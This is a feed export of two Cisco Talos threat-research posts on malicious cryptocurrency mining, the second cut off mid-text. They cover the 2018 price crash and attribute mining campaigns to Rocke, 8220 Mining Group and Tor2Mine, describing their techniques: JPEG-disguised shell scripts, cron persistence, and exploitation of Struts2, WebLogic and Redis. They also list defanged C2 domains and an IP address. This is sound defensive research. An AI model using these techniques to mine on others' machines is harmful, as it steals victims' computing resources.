Talos Bloghttps://blog.talosintelligence.com/Talos Group, by Ciscoennoreply@blogger.com (Nick Biasini)Wed, 19 Dec 2018 00:15:32 PSTBloggertag:blogger.com,1999:blog-1029833275466591797974125feedburner/Taloshttps://feedburner.google.comAs Cryptocurrency Crash Continues, Will Mining Threat Follow?http://feedproxy.google.com/~r/feedburner/Talos/~3/eliGHOZr-Qg/cryptocurrency-future-2018.htmlcryptocurrencycryptominingminersTalosnoreply@blogger.com (Nick Biasini)Tue, 18 Dec 2018 08:33:00 PSTtag:blogger.com,1999:blog-1029833275466591797.post-8830818714735496490<div dir="ltr" style="text-align: left;" trbidi="on"><i>Post authored by <a href="https://www.google.com/url?q=https://twitter.com/infosec_nick&amp;sa=D&amp;ust=1545149874016000">Nick Biasini</a>.</i><br /><h3 id="h.cyznuxuk3rz4">Executive Summary</h3>As 2018 draws to a close, one technology has definitively left its mark on the year: cryptocurrencies. Digital currencies started the year out strong after a meteoric rise toward the end of 2017. Since then, it's safe to say that cryptocurrencies have had a massive impact globally, especially on the threat landscape. However, 2018 is ending on a sour note for these currencies, as they have been in steady decline, ending in a sudden drop resulting in losses in excess of 75 percent of their value from the highs of late 2017 and early 2018. <br /><br />Malicious cryptocurrency mining was the new payload of choice for adversaries and recurring revenue, dislodging the lump-sum payouts of threats like ransomware atop the threat landscape.<br /><br />But the sudden collapse of the market, after a gradual decline, raises the question about how the threat landscape would be impacted, if at all. Despite conventional wisdom, Cisco Talos hasn't seen a notable shift away from cryptocurrency mining. We have seen pockets of movement, but they have lived explicitly in the email space where both threat distribution and botnets play a crucial role. As 2018 proceeded, adversaries have shifted payloads in the email space away from cryptocurrency mining and toward more modular threats like Emotet and remote access trojans (RATs). Talos is also releasing <a href="https://blog.talosintelligence.com/2018/12/cryptomining-campaigns-2018.html">another blog today</a> outlining some of the campaigns we've seen recently from some well-known actors who have a history with cryptocurrency mining.<br /><br />After reviewing the real-world impact and associated data, it appears that cryptocurrency mining is not slowing down, and if anything, could be slightly increasing in frequency for certain aspects of the landscape. As we move into 2019, it's likely that the payloads of choice will continue to diverge between different aspects of the threat landscape. Regardless, enterprises need to be prepared to deal with malicious or unauthorized cryptocurrency mining activities on their respective networks, because it's not going away — at least not yet.<br /><a name='more'></a><br /><h3 id="h.jbd1jo6zo4uu">Introduction</h3>It's clear, as far as the threat landscape is concerned, 2018 was the year of malicious cryptocurrency mining. Cisco Talos first covered cryptocurrency mining in <a href="https://www.google.com/url?q=https://blog.talosintelligence.com/2018/01/malicious-xmr-mining.html&amp;sa=D&amp;ust=1545149874018000">early 2018</a>, and again at multiple points throughout the year, including a <a href="https://www.google.com/url?q=https://talosintelligence.com/resources/59&amp;sa=D&amp;ust=1545149874018000">whitepaper discussing the threat and associated coverage</a>. In these attacks, malicious actors inject malware into systems and steal their computing power to "mine" cryptocurrencies. If done on a large scale, this kind of attack could cost enterprises a great deal of energy and resources. And for a personal user, it could significantly slow down their computing power and speed.<br /><br />At the time, it was clear that actors had started to push quickly into primarily Monero-based cryptocurrency mining as a payload of choice. Since then, we have witnessed one of the most significant shifts in the threat landscape in years — and perhaps ever. Adversaries have gone all in on the idea of the recurring revenue model of cryptocurrency mining instead of the lump-sum gamble that ransomware provided so effectively throughout 2016 and 2017. In ransomware attacks, attackers asked for infected users to pay them a sum of money in exchange for the return of their information. But with miners, the attackers see revenue on a daily basis from their activities.<br /><br />This mass migration does have its risks, however. Primary among them is the value of the currency being mined. When we first wrote about malicious cryptocurrency mining, an adversary could hope to make about $0.25 per day for a basic home computer. As of the writing of this blog, that value has cratered to a little more than $0.04 per day for that same computer. As you can imagine, this has had an impact on adversaries' bottom lines. It now takes almost six systems to create the same revenue that one generated previously. Before we get too deep into the potential impact, let's discuss the size and scope of the role that cryptocurrency mining had on the threat landscape in 2018. One of the most interesting aspects is how widely this shift was adopted across multiple different attack avenues including spam, web and active exploitation.<br /><h3 id="h.l2gbyfr5rs7j">Spam and the mining effect</h3>One of the best indicators for how a threat is affecting the threat landscape is spam levels. Much of the spam we see on a daily basis is being generated from botnets, and those botnets are undertaking that activity to generate revenue. This is where we have seen some shifts throughout the year of cryptocurrency mining. As you can see, below the amount of overall spam, excluding two extremely high volume campaigns early in 2018, is down.<br /><div class="separator" style="clear: both; text-align: center;"><a href="https://4.bp.blogspot.com/-Ai3vyp6oMws/XBkVyldtjLI/AAAAAAAABio/PXge2bHxBhsKmGAAMkdErDSjDgrZZ1YCwCLcBGAs/s1600/image1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="525" data-original-width="912" height="230" src="https://4.bp.blogspot.com/-Ai3vyp6oMws/XBkVyldtjLI/AAAAAAAABio/PXge2bHxBhsKmGAAMkdErDSjDgrZZ1YCwCLcBGAs/s400/image1.png" width="400" /></a></div>Late in 2017 and continuing into early in 2018, spam levels were dropping.Since then, they have begun to rise, and are now approaching the levels seen through most of 2017. This is indicative of botnet functionality shifts where some of the systems that had previously been used to send spam may have been altered to instead work on cryptocurrency mining. There have been reports throughout the past year of botnets such as Necurs experimenting with cryptocurrency mining instead of spam generation. However, there are two sides to the spam landscape, and they tell two different stories. One side are those that control the botnets that send spam, the other uses spam as a mechanism to spread their malware.<br /><br />Adversaries that deliver their malware via spam are a different demographic, and as such, the landscape appears slightly different. Early on in 2018,Talos saw near constant campaigns delivering malicious cryptocurrency miners directly or using a downloader. As the year progressed, and more recently as the price of cryptocurrencies began to waiver, we are seeing adversaries push into different areas, delivering different payloads. <br /><br />Emotet became one of the big winners as cryptocurrency miners waned. We have seen Emotet continue to be delivered in large numbers when active. Emotet continues to be a highly effective, modular payload that contains several functions, now including <a href="https://www.google.com/url?q=https://threatpost.com/in-county-crippled-by-hurricane-water-utility-targeted-in-ransomware-attack/138327/&amp;sa=D&amp;ust=1545149874025000">ransomware</a>. These types of modular malware frameworks that allow adversaries to deliver varied payloads are going to continue to rise in popularity, as the final payload can depend on a lot of external factors. Today, when looking at the spam landscape, you do periodically see campaigns delivering miners, but they are far less common than they were earlier in 2018.Now, you are more likely to find a RAT or modular threat like Emotet than a miner. Cryptocurrency mining has had a marked impact on the email threat landscape in 2018, but email is just one of the key indicators on the threat landscape. Next, we'll take a look at web-based attacks.<br /><h3 id="h.4dplucmybvmc">Web</h3>Web-based attacks continue to be heavily leveraged by attackers to compromise systems around the world. In previous years, exploit kits and malvertising campaigns were used to distribute ransomware and other threats to compromised systems. Since late 2016, there has been a marked decline in global exploit kit activity. Of the campaigns that remained, malicious cryptomining payloads were being distributed commonly via downloaders, rather than some of the other malware that had been historically associated with these campaigns. Along with exploit kits and malvertising, cryptocurrency mining malware was also frequently seen being delivered through fake Flash Player updates. In these attacks, victims are prompted to update their version of Adobe Flash Player, but the malware downloads a payload used to infect systems and mine cryptocurrency for cybercriminals. <br /><br />Likewise, "in-browser" mining such as <a href="https://www.google.com/url?q=https://coinhive.com/&amp;sa=D&amp;ust=1545149874027000">CoinHive</a> became popular with many websites using scripts embedded on web pages that cause visitors of the websites to mine cryptocurrency in their web browsers. Cryptocurrency mining became so mainstream in 2018 that some shareware applications were even prompting users to allow them to leverage their systems to mine cryptocurrency as a way to support the application's developers. Regardless of the methodology, there is too much of an opportunity for adversaries to pass up. Malicious cryptocurrency mining can involve almost no additional communications, and in the case of in-browser or shareware-supported mining, it's as simple as "some money is better than no money." As long as there is money to be made, malicious or unauthorized cryptocurrency mining will be part of daily life on the internet. We've covered web and email, now let's now turn our focus to more active measures that adversaries take with direct, active exploitation.<br /><h3 id="h.vhskkl4fxig3">Active exploitation</h3>One unique aspect of malicious cryptocurrency mining is that the amount of revenue a compromised system can generate is directly related to the hardware that the system is running. Cisco Talos observed, for at least a year, as adversaries discussed the potential for malicious cryptocurrency mining and then implement those capabilities. Talos has seen countless examples of how active exploitation can play a significant role in malicious cryptocurrency mining. <br /><br />From Apache Struts to Eternal Blue, Oracle WebLogic, and other widespread remotely exploitable bugs, adversaries have been actively exploiting systems to deliver hordes of miners. In some cases, adversaries added worming functionality — meaning it can self-replicate and affect other machines — to infect large swaths of machines as fast as possible. Regardless of the methodology, servers are a vital target for malicious cryptocurrency mining because of the increased revenue potential. This has mainly remained steady despite the volatility of the value in the currency itself. The fact remains that cryptocurrency mining generates revenue, and once an actor or group of actors has taken the time and cost to retool for a new threat, it's going to take a lot to move them off of that particular payload. If there were to be a significant global shift in cryptocurrency mining, this would be the place that it would likely be most noticeable. Each area of the threat landscape has been impacted in some way by cryptocurrency mining, but the real-life impacts are where enterprises are most concerned. <br /><br />For more detail on the progression of these campaigns over the past year, with a specific focus on these active exploitation campaigns, see our accompanying blog <a href="https://blog.talosintelligence.com/2018/12/cryptomining-campaigns-2018.html">here</a>.<br /><h3 id="h.199bcyln7vsq">Real-life impact</h3>One of the best indicators of where we are with a threat is the real-life impact. For this blog, there are two primary areas where that data will be: from the endpoint and the network. Without question, cryptocurrency mining has been the dominant threat on the threat landscape for much, if not all, of 2018. The most common alert we received in 2018 was related to cryptocurrency mining, its delivery, or its propagation by a significant margin. What's even more interesting is it doesn't appear to be fading, at least not yet.<br /><br />When we began looking at the data, the expectation was that the overall amount of cryptocurrency mining activity would be decreasing in recent months, but that wasn't the case. There has been a small decrease in the amount of cryptocurrency mining activity, but those have been pigeonholed into a couple of areas of the threat landscape. The most substantial decrease has been in the number of malicious spam emails. Earlier on in 2018, we would see campaigns running around the clock delivering cryptocurrency miners. By the end of 2018, that was not the case.Instead, it's threats like RATs and Emotet that are dominating that particular landscape.<br /><div class="separator" style="clear: both; text-align: center;"><a href="https://4.bp.blogspot.com/-pIVp4D4SYF4/XBkWnpMqKZI/AAAAAAAABi0/LemTzGH2jzMEKKj3IFf8yTWeCcFYUhUfgCLcBGAs/s1600/120518%2BCryptomining%2BSignature%2Bv2_network.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="765" data-original-width="1459" height="332" src="https://4.bp.blogspot.com/-pIVp4D4SYF4/XBkWnpMqKZI/AAAAAAAABi0/LemTzGH2jzMEKKj3IFf8yTWeCcFYUhUfgCLcBGAs/s640/120518%2BCryptomining%2BSignature%2Bv2_network.jpg" width="640" /></a></div>As you can see, there has been some variance in the number of events from week to week over the past six months, but generally, the trend line has held, and the overall volume of alerts has not changed significantly since June 2018. <br /><br />Let's start by looking at network-based detections.In this particular circumstance, we are looking specifically at cryptocurrency mining activity on the wire, and not the delivery or propagation of the miners. This is a clean look specifically at actual mining activity instead of the distribution. Notice that if you look at the trend line, levels have increased slightly dating back to June. So despite the fact that we do not see miners being pushed at the same level, specifically in the email space, the overall capabilities remain primarily static. This implies both long-term mining activity and the importance of active exploitation, brute forcing and web-based attacks to the threat landscape, specifically around malicious mining.<br /><div class="separator" style="clear: both; text-align: center;"><a href="https://2.bp.blogspot.com/-Gcqo4kawcmU/XBkWvfeHpVI/AAAAAAAABi4/R8Xh22qpmEMUoDcNpPAPLI0LDroJ5XL6ACLcBGAs/s1600/120518%2BCryptomining%2BSignature%2Bv2_endpoint.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="744" data-original-width="1459" height="326" src="https://2.bp.blogspot.com/-Gcqo4kawcmU/XBkWvfeHpVI/AAAAAAAABi4/R8Xh22qpmEMUoDcNpPAPLI0LDroJ5XL6ACLcBGAs/s640/120518%2BCryptomining%2BSignature%2Bv2_endpoint.jpg" width="640" /></a></div>The endpoint data held steady for the most part but it does vary more widely from one day to the next. That could be the result of systems being shut down or cleaned at irregular intervals. Regardless, you do not see any significant downward movement, including the last month when the price of cryptocurrencies truly cratered.<br /><h3 id="h.2yy4wjlkf9b0">Cryptocurrency price crash</h3>The real driving factor behind this potential large-scale shift is the value of cryptocurrency across the board. It reached levels in late 2017 that were not thought possible a mere six months earlier. As that rise continued, extreme interest in cryptocurrencies rose along with it. Quickly, people that had invested thousands of dollars a few years prior were now knocking on the door of being millionaires. This also coincided with the rise of ransomware, since cryptocurrencies are the primary method of payment.<br /><br />The benefits weren't restricted to those that adopted the new currency early on. Adversaries and businesses alike found themselves sitting on sizable chunks of digital currency. Bad actors that were accepting bitcoin early on saw its value increase by tenfold, if not more, but there were always murmurs and skepticism around the meteoric rise in value.<br /><br />Over the past six months, the value of cryptocurrencies had begun to fade, and over the last month-plus, the values have plummeted. At this point, most of the currencies have lost at least 75 percent of their peak values and late investors and adversaries may be paying the price.<br /><div class="separator" style="clear: both; text-align: center;"><a href="https://4.bp.blogspot.com/-Ya_ebjtzMAw/XBkW2e5pErI/AAAAAAAABi8/77VXFhGMjNcIu5tRH6iqP3X065noWVjxgCLcBGAs/s1600/image8.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="744" data-original-width="1459" height="326" src="https://4.bp.blogspot.com/-Ya_ebjtzMAw/XBkW2e5pErI/AAAAAAAABi8/77VXFhGMjNcIu5tRH6iqP3X065noWVjxgCLcBGAs/s640/image8.jpg" width="640" /></a></div>Late in 2017, Bitcoin set an all-time high of nearly $20,000, and since then, it's been a steady decline to a value of less than $4,000, a decline of more than 75 percent from its peak in December 2017.<br /><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-W8pxnUpwNJQ/XBkW770gsuI/AAAAAAAABjE/VT4XkV8KFmYrHWmzbgScC9g7bPeZqx0FwCLcBGAs/s1600/image7.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="744" data-original-width="1459" height="326" src="https://1.bp.blogspot.com/-W8pxnUpwNJQ/XBkW770gsuI/AAAAAAAABjE/VT4XkV8KFmYrHWmzbgScC9g7bPeZqx0FwCLcBGAs/s640/image7.jpg" width="640" /></a></div>Monero has followed a similar path, albeit on a smaller scale. Early in 2018, Monero prices hit an all-time high of just above $470 per coin and a steady decline has followed throughout 2018. The value has now cratered to below $55 a coin — an astonishing loss of 86 percent of its value in less than a year as of the time of writing. <br /><br />Although it's been a steady decline throughout the past year, the last month has been particularly brutal. Both Bitcoin and Monero have been hemorrhaging value in the past 30 days, and the effects are stark. Bitcoin has lost an improbable 40 percent of its value in the last month, only to be topped by Monero, which lost a staggering 50 percent of its value in the past 30 days.<br /><div class="separator" style="clear: both; text-align: center;"><a href="https://3.bp.blogspot.com/-dvDCoamJ7cc/XBkXB4SOvgI/AAAAAAAABjM/kBBWDlykwUAMMIJOMAGxyu6rTAr-gzYDwCLcBGAs/s1600/image4.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="744" data-original-width="1459" height="326" src="https://3.bp.blogspot.com/-dvDCoamJ7cc/XBkXB4SOvgI/AAAAAAAABjM/kBBWDlykwUAMMIJOMAGxyu6rTAr-gzYDwCLcBGAs/s640/image4.jpg" width="640" /></a></div><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-ptItfb-5NmU/XBkXG9xI21I/AAAAAAAABjU/3SB6nwCn6BAmf0x8ybTZXP4ySFz8XtUPgCLcBGAs/s1600/image3.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="744" data-original-width="1459" height="326" src="https://1.bp.blogspot.com/-ptItfb-5NmU/XBkXG9xI21I/AAAAAAAABjU/3SB6nwCn6BAmf0x8ybTZXP4ySFz8XtUPgCLcBGAs/s640/image3.jpg" width="640" /></a></div>Despite its recent collapse, it's evident that cryptocurrency is here to stay and will remain a player on the threat landscape for quite some time. For adversaries using cryptocurrency for payments such as ransomware, it doesn't have much of an effect, they increase the amount of coin they request to account for the decreased value.<br /><h3 id="h.mux2zxcwylnr">Future of mining</h3>Now that all the data has been discussed the real question remains: What does this mean for the future of mining?<br /><br />The honest answer is we don't know, but there is plenty of room to speculate. The first thing to realize is cryptocurrency mining is a large portion of the threat landscape, and it will continue to be, but the question is where. The tooling and methodology required to make the shift for a threat group doing things like active exploitation and brute forcing are going to be exceedingly different from those looking to compromise average users using threats like cryptocurrency mining, RATs and banking trojans, among others. As such, the outlook for their respective landscapes differs significantly. <br /><br />Those groups that focus on active exploitation and brute forcing are all in on mining, and it will take some additional force to move them off of this payload, mainly because of the resources they've already committed. It takes time and effort to shift away from things like distributed denial-of-service and spam botnets to cryptomining. Many of these adversaries took the time and effort to shift away and focus on mining. A decrease in the value of the currency isn't going to move them off of that. <br /><br />Additionally, it's a question of risk and opportunity. Conducting a campaign of malicious cryptocurrency mining is far less likely to draw the attention of a security team or law enforcement when compared to some of the noisier threats like ransomware that requires command and control, victim interaction and continued communications. Malicious mining, on the other hand, allows for somewhat stable revenue generation, despite being a potentially limited earning potential per system. Money is money, and if you are operating at scale and stealing all the resources, it's primarily profit.<br /><h3 id="h.5hs7lkuv4dld">Conclusion</h3>Malicious cryptocurrency mining is a massive part of the threat landscape in 2018 and appears poised to remain a significant player in 2019 and beyond. Despite the recent catastrophic price collapse of these currencies, it is still profitable in many circumstances. That does not mean that the collapse has had no impact —we've seen that it has had an impact on the volume of spam.<br /><br />The data shows that this activity has been steady for the past six months and although there is a potential for a significant shift in the next six months, at least so far, it isn't in the data. Time will be the true wildcard in how mining lives on. Given time, adversaries may find a more attractive target, but right now, there are not many options that generate reliable income, with minimal risk, and don't require remote access of compromised systems. This is probably the biggest reason why mining isn't going anywhere:It's profitable. And because it's easy, anyone looking to make money will be drawn to it. <br /><br />The real question is: What's next? What are the threats that enterprises should be preparing for today? Modular, flexible malware is likely the path forward as the avenues for monetization continues to change and evolve. Adversaries that are driven by monetary gain stand to generate the most revenue if they profile the end system, much like downloaders can and do today. If you compromise a gaming system or a high-end server a threat like a miner might be ideal. However, if you compromise a high-end laptop located in the U.S., you may decide ransomware is the best avenue, or if it's part of a corporate domain, just monetizing the access might be preferred. Or when compromising an average computer in a developing country, a simple bot might be best to provide a foothold to propagate an actor's malicious intentions or attack other systems and computers with an added layer of anonymity.<br /><br />Regardless, it's clear why adversaries desire this type of flexibility. As systems get faster and the ways that a compromised system can be monetized continue to grow, modular malware will rise in popularity.</div><img src="http://feeds.feedburner.com/~r/feedburner/Talos/~4/eliGHOZr-Qg" height="1" width="1" alt=""/>2018-12-18T12:43:44.313-05:000https://blog.talosintelligence.com/2018/12/cryptocurrency-future-2018.htmlConnecting the dots between recently active cryptominershttp://feedproxy.google.com/~r/feedburner/Talos/~3/DemsFFZIKpI/cryptomining-campaigns-2018.htmlcryptocurrencycryptominingminersTalosThreat Researchnoreply@blogger.com (Nick Biasini)Tue, 18 Dec 2018 08:33:00 PSTtag:blogger.com,1999:blog-1029833275466591797.post-2483030409657759965<i>Post authored by <a href="https://www.google.com/url?q=https://twitter.com/chinahanddave&amp;sa=D&amp;ust=1545149724666000">David Liebenberg</a> and <a href="https://www.google.com/url?q=https://twitter.com/smugyeti&amp;sa=D&amp;ust=1545149724667000">Andrew Williams</a>.</i><br /><h3>Executive Summary</h3>Through Cisco Talos' investigation of illicit cryptocurrency mining campaigns in the past year, we began to notice that many of these campaigns shared remarkably similar TTPs, which we at first mistakenly interpreted as being attributed to a single actor. However, closer analysis revealed that a spate of illicit mining activity over the past year could be attributed to several actors that have netted them hundreds of thousands of U.S. dollars combined.<br /><br />This blog examines these actors' recent campaigns, connects them to other public investigations and examines commonalities among their toolsets and methodologies. <br /><br />We will cover the recent activities of these actors:<br /><ul><li>Rocke —A group that employs Git repositories, HTTP FileServers (HFS), and Amazon Machine Images in their campaigns, as well as a myriad of different payloads, and has targeted a wide variety of servers, including Apache Struts2, Jenkins and JBoss.</li></ul><ul><li>8220 Mining Group —Active since 2017, this group leverages Pastebin sites, Git repositories and malicious Docker images. The group targets Drupal, Hadoop YARN and Apache Struts2.</li></ul><ul><li>Tor2Mine —A group that uses tor2web to deliver proxy communications to a hidden service for command and control (C2).</li></ul>These groups have used similar TTPs, including:<br /><ul><li>Malicious shell scripts masquerading as JPEG files with the name "logo*.jpg" that install cron jobs and download and execute miners.</li></ul><ul><li>The use of variants of the open-source miner XMRig intended for botnet mining, with versions dependent on the victim's architecture.</li></ul><ul><li>Scanning for and attempting to exploit recently published vulnerabilities in servers such as Apache Struts2, Oracle WebLogic and Drupal.</li></ul><ul><li>Malicious scripts and malware hosted on Pastebin sites, Git repositories and domains with .tk TLDs.</li></ul><ul><li>Tools such as XHide Process Faker, which can hide or change the name of Linux processes and PyInstaller, which can convert Python scripts into executables.</li></ul>We were also able to link these groups to other published research that had not always been linked to the same actor. These additional campaigns demonstrate the breadth of exploitation activity that illicit cryptocurrency mining actors engaged in. <br /><br /><a name='more'></a>The recent decline in the value of cryptocurrency is sure to affect the activities of these adversaries. For instance, Rocke began developing destructive malware that posed as ransomware, diversifying their payloads as a potential response to declining cryptocurrency value. This was a trend that the Cyber Threat Alliance had predicted in their 2018 white paper on the <a href="https://www.google.com/url?q=https://www.cyberthreatalliance.org/wp-content/uploads/2018/09/CTA-Illicit-CryptoMining-Whitepaper.pdf&amp;sa=D&amp;ust=1545149724689000">illicit cryptocurrency threat</a>. However, activity on Git repositories connected to the actors demonstrates that their interest in illicit cryptocurrency mining has not completely abated. Talos published <a href="https://blog.talosintelligence.com/2018/12/cryptocurrency-future-2018.html">separate research today covering this trend.</a><br /><h3>Timeline of actors' campaigns</h3><h4><table cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: left; text-align: center;"><tbody><tr><td style="text-align: center;"><a href="https://3.bp.blogspot.com/-jK9gU5Z4g6M/XBkSwhst2WI/AAAAAAAABh0/WgEn6WVJ0Aogu10HmoVBx-2CnIvTrCvTACLcBGAs/s1600/image5.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="1600" data-original-width="762" src="https://3.bp.blogspot.com/-jK9gU5Z4g6M/XBkSwhst2WI/AAAAAAAABh0/WgEn6WVJ0Aogu10HmoVBx-2CnIvTrCvTACLcBGAs/s1600/image5.jpg" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;">Timeline of Activity</td></tr></tbody></table></h4><h4>Introduction</h4>Illicit cryptocurrency mining remained one of the most common threats Cisco Talos observed in 2018. These attacks steal CPU cycles from compromised devices to mine cryptocurrencies and bring in income for the threat actor. Campaigns delivering mining malware can also compromise the victim in other ways, such as in delivering remote access trojans (RATs) and other malware. <br /><br />Through our investigation of illicit cryptocurrency mining campaigns in the past year, we began to notice that many shared remarkably similar TTPs, which we at first mistakenly interpreted as being attributed to a single actor. After completing analysis of these attack's wallets and command and control (C2) servers we discovered that a spate of illicit mining activity over the past year could be attributed to several actors. This illustrates the prevalent use of tool sharing or copying in illicit mining. <br /><br />We also observed that, by examining these groups' infrastructure and wallets, we were able to connect them to other published research that had not always been related to the same actor, which demonstrated the breadth of exploitation activity that illicit cryptocurrency mining actors engaged in. <br /><br />We first started tracking these groups when we began monitoring a prolific actor named Rocke and noticed that several other groups were using similar TTPs. <br /><br />We began following the activities of another prolific actor through a project forked on GitHub by Rocke: the 8220 Mining Group. We also noticed a similar toolset being used by an actor we named "tor2mine," based on the fact that they additionally used tor2web services for C2 communications. <br /><br />We also discovered some actors that share similarities to the aforementioned groups, but we could not connect them via network infrastructure or cryptocurrency wallets. Through investigating all these groups, we determined that combined, they had made hundreds of thousands of dollars in profits.<br /><br /><h4></h4><h4>Rocke/Iron cybercrime group</h4>Cisco Talos wrote about <a href="https://www.google.com/url?q=https://blog.talosintelligence.com/2018/08/rocke-champion-of-monero-miners.html&amp;sa=D&amp;ust=1545149724706000">Rocke</a> earlier this year, an actor linked to the Iron Cybercrime group that actively engages in distributing and executing cryptocurrency mining malware using a varied toolkit that includes Git repositories, HTTP FileServers (HFS), and a myriad of different payloads, including shell scripts, JavaScript backdoors, as well as ELF and PE miners. Talos first observed this actor when they attacked our honeypot infrastructure. <br /><br />In the campaigns we discussed, Rocke targeted vulnerable Apache Struts2 servers in the spring and summer of 2018. Through tracking the actor's wallets and infrastructure, we were able to link them to some additional exploit activity that was reported on by other security firms but in most instances was not attributed to one actor. Through examining these campaigns that were not previously linked, we observed that Rocke has also targeted <a href="https://www.google.com/url?q=https://www.f5.com/labs/articles/threat-intelligence/new-jenkins-campaign-hides-malware--kills-competing-crypto-miner&amp;sa=D&amp;ust=1545149724712000">Jenkins </a>and <a href="https://www.google.com/url?q=https://www.alibabacloud.com/blog/jbossminer-mining-malware-analysis_593804&amp;sa=D&amp;ust=1545149724712000">JBoss</a> servers, continuing to rely on malicious Git repositories, as well as malicious <a href="https://www.google.com/url?q=https://summitroute.com/blog/2018/09/24/investigating_malicious_amis/&amp;sa=D&amp;ust=1545149724714000">Amazon Machine Images</a>. They have also been expanding their payloads to include malware with worm-like characteristics and destructive ransomware <a href="https://www.google.com/url?q=https://researchcenter.paloaltonetworks.com/2018/09/unit42-xbash-combines-botnet-ransomware-coinmining-worm-targets-linux-windows/&amp;sa=D&amp;ust=1545149724714000">capabilities</a>. Several campaigns used the XHide Process Faker tool. <br /><br />We have since discovered additional information that suggests that Rocke has been continuing this exploit activity. Since early September, we have observed Rocke exploiting our Struts2 honeypots to download and execute files from their C2 ssvs[.]space. Beginning in late October, we observed this type of activity in our honeypots involving another Rocke C2 as well: sydwzl[.]cn. <br /><br />The dropped malware includes ELF (Executable and Linkable Format) backdoors, bash scripts to download and execute other malware from Rocke C2s, as well as illicit ELF Monero miners and associated config files.<br /><br />While keeping an eye on honeypot activity related to Rocke, we have continued to monitor their GitHub account for new activity. In early October, Rocke forked a repository called <a href="https://www.google.com/url?q=https://github.com/MRdoulestar/whatMiner&amp;sa=D&amp;ust=1545149724720000">whatMiner</a>, developed by a Chinese-speaking actor. WhatMiner appears to have been developed by another group called the 8220 Mining Group, which we will discuss below. The readme for the project describes it as "collecting and integrating all different kinds of illicit mining malware."<br /><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-G3Rbkg_o3Mc/XBkTFOJxe5I/AAAAAAAABh8/BWe5f_IQcIkJPH7e45o9Rzvyyb1Zzq1bQCLcBGAs/s1600/image2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="435" data-original-width="959" height="289" src="https://1.bp.blogspot.com/-G3Rbkg_o3Mc/XBkTFOJxe5I/AAAAAAAABh8/BWe5f_IQcIkJPH7e45o9Rzvyyb1Zzq1bQCLcBGAs/s640/image2.png" width="640" /></a></div><h4></h4><h4>Git repository for whatMiner</h4>Looking at some of the bash scripts in the repository, it appears that they scan for and exploit vulnerable Redis and Oracle WebLogic servers to download and install Monero miners. The scripts also rely on a variety of Pastebin pages with Base64-encoded scripts in them that download and execute miners and backdoors on to the victim's machines. These malicious scripts and malware masquerade as JPEG files and are hosted on the Chinese-language file-sharing site thyrsi[.]com. The only difference in Rocke's forked version is that they replaced the Monero wallet in the config file with a new one.<br /><br />While looking through this repository, we found a folder called "sustes." There were three samples in this folder: mr.sh, a bash script that downloads and installs an illicit Monero miner; xm64, an illicit Monero miner; and wt.conf, a config file for the miner. These scripts and malware very closely match the ones we found in our honeypots with the same file names, although the bash script and config file were changed to include Rocke's infrastructure and their Monero wallet.<br /><br />Many of the samples obtained in our honeypots reached out to the IP 118[.]24[.]150[.]172 over TCP. Rocke's C2, sydwzl[.]cn, also resolves to this IP, as did the domain sbss[.]f3322[.]net, which began experiencing a spike in DNS requests in late October. Two samples with high detection rates submitted to VirusTotal in 2018 made DNS requests for both domains. Both samples also made requests for a file called "TermsHost.exe" from an IP 39[.]108[.]177[.]252, as well as a file called "xmr.txt" from sydwzl[.]cn. In a previous Rocke campaign, we observed a PE32 Monero miner sample called "TermsHost.exe" hosted on their C2 ssvs[.]space and a Monero mining config file called "xmr.txt" on the C2 sydwzl[.]cn.<br /><br />When we submitted both samples in our ThreatGrid sandbox, they did not make DNS requests for sydwzl[.]cn, but did make GET requests for hxxp://users[.]qzone[.]qq[.]com:80/fcg-bin/cgi_get_portrait.fcg?uins=979040408. The resulting download is an HTML text file of a 301 error message. When we looked at the profile for the user 979040408@qq.com, we observed that they had numerous posts related to Chinese-language hacking and exploit forums, as well as advertisements for distributed denial-of-service (DDoS) services.<br /><br />Note that Rocke activity tapered off towards the end of the year. Security researchers at Chinese company Alibaba have taken down Rocke infrastructure that was hosted on Alibaba Cloud. In addition, there has not been activity on Rocke’s github since November, nor have we seen related samples in our honeypots since that time.<br /><br /><h4>8220 Mining Group</h4>As we previously described, Rocke originally forked a repository called "whatMiner." We believe this tool is linked to another Chinese-speaking, Monero-mining threat actor — 8220 Mining Group — due to the repository's config files' default wallet and infrastructure. Their C2s often communicate over port 8220, earning them the 8220 Mining Group moniker. This group uses some similar TTPs to Rocke. <br /><br />We first observed the 8220 Mining Group in our Struts2 honeypots in March 2018. Post-exploitation, the actor would issue a cURL request for several different types of malware on their infrastructure over port 8220. The dropped malware included ELF miners, as well as their associated config files with several of 8220 Mining Group's wallets entered in the appropriate fields. This is an example of the type of commands we observed:<br /><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-N8vmBZIyNH0/XBkTMgozjXI/AAAAAAAABiA/WdL1yKlWJVwqXSuzeKgozMuw2lg-xpQnACLcBGAs/s1600/image6.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="30" data-original-width="577" height="32" src="https://1.bp.blogspot.com/-N8vmBZIyNH0/XBkTMgozjXI/AAAAAAAABiA/WdL1yKlWJVwqXSuzeKgozMuw2lg-xpQnACLcBGAs/s640/image6.png" width="640" /></a></div>We were able to link the infrastructure and wallets observed in the attacks against our honeypots, as well as in the Git repository, with several other campaigns that the 8220 mining group is likely responsible for.<br /><br />These campaigns illustrate that beyond exploiting Struts2, 8220 Mining Group has also exploited <a 